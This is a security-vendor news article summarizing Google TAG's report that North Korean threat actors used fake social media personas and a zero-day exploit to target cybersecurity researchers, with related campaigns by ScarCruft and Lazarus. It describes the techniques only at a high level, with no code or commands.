ClickCease Zero-Day Exploits: Cybersecurity Researchers Under Attack

Content Table

Join Our Popular Newsletter

Join 4,500+ Linux & Open Source Professionals!

2x a month. No spam.

Zero-Day Exploits: Cybersecurity Researchers Under Attack

Wajahat Raja

September 20, 2023 - TuxCare expert team

Threat actors linked to North Korea have targeted cybersecurity experts in recent weeks, causing zero-day exploits. These attackers are infiltrating the researchers’ networks by exploiting a zero-day vulnerability in unreleased software. Google’s Threat Analysis Group (TAG) discovered these illicit behaviors, shedding light on the adversaries’ strategies.


The Deceptive Approach: Building Trust on Social Media


North Korean threat actors have devised a deceptive technique. To develop contacts with possible targets, they create phony identities on prominent social media platforms such as X (previously Twitter) and Mastodon. These imposters hold extensive talks while pretending to be interested in collaborative security subjects. When they make contact on social media, they move on to secure messaging tools like Signal, WhatsApp, or Wire.

Hacker attacks on researchers have become so much easier with social engineering. This way, attackers earn the trust of cybersecurity researchers. They eventually transmit a malicious file that contains zero-day bug exploitation of a commonly used software package. It is vital to mention that the damaged software is currently being remedied.

Measures for Advanced Payload and Anti-Virtual Machine


Following the execution of the malicious payload, it performs a series of tests to discover virtual machines (VMs). The information gathered, including a screenshot, is subsequently sent to a site controlled by the attackers. This innovative strategy seeks to avoid detection while also improving the attackers’ capabilities.


A suspended account on X that has been active since at least October 2022 suggests that the attackers were persistent. They’ve even published a proof-of-concept (PoC) exploit code for critical privilege escalation vulnerabilities in the Windows Kernel, such as CVE-2021-34514 and CVE-2022-21881.


A Recurring Pattern: Collaboration-Related Lures


This isn’t the first time North Korean actors have started cyberattacks on security experts. GitHub disclosed a campaign employing phony identities targeting the cybersecurity sector in July 2023. The attackers enticed victims to collaborate on GitHub repositories before convincing them to clone and execute malicious code.


Google TAG also discovered a standalone Windows program named GetSymbol which the attackers created and posted on GitHub. While it was originally intended to obtain debugging symbols from trusted sources, it can also download and execute arbitrary code from a command-and-control (C2) domain. Because of its complex strategy, it is a formidable secondary infection vector.


A More Comprehensive Threat Landscape


The finding aligns with AhnLab Security Emergency Response Centre (ASEC) discoveries, which revealed ScarCruft, a North Korean nation-state actor, using LNK file lures in phishing emails. These enticements contain a backdoor capable of extracting sensitive data and carrying out dangerous commands.

According to Microsoft’s recent discoveries, several North Korean threat actors are targeting the Russian government and defense sector, possibly for intelligence gathering, while simultaneously assisting Russia in its confrontation with Ukraine. This extended breadth of activities highlights the North Korean cyber threats’ adaptability and varied nature. It also places significant importance on the need for zero-day security measures.


International Implications of Zero-Day Exploits


Aside from intelligence collection and computer espionage, the Lazarus Group, another North Korean entity, was charged by the FBI with cashing out $41 million in virtual currency from, an online casino and betting site. This vulnerability disclosure underscores the broader goals of North Korean cyber threat actors, which include collecting cryptocurrency funds for the state.




Finally, North Korean threat actors use a variety of approaches to achieve their goals, ranging from zero-day vulnerability to phishing attacks. For protecting research data, cybersecurity researchers must remain attentive and use stringent security measures. These cybersecurity threats emphasize the critical need for international cooperation and information sharing in mitigating the impact of hostile operations.

The sources for this piece include articles in The Hacker News and BleepingComputer.

Zero-Day Exploits: Cybersecurity Researchers Under Attack
Article Name
Zero-Day Exploits: Cybersecurity Researchers Under Attack
Stay informed about the latest zero-day exploits! Learn how hackers exploit zero-day bugs and protect your data from cyber threats.
Publisher Name
Publisher Logo

Looking to automate vulnerability patching without kernel reboots, system downtime, or scheduled maintenance windows?

Learn About Live Patching with TuxCare

Become a TuxCare Guest Writer

Get started




Linux & Open Source

Subscribe to
our newsletter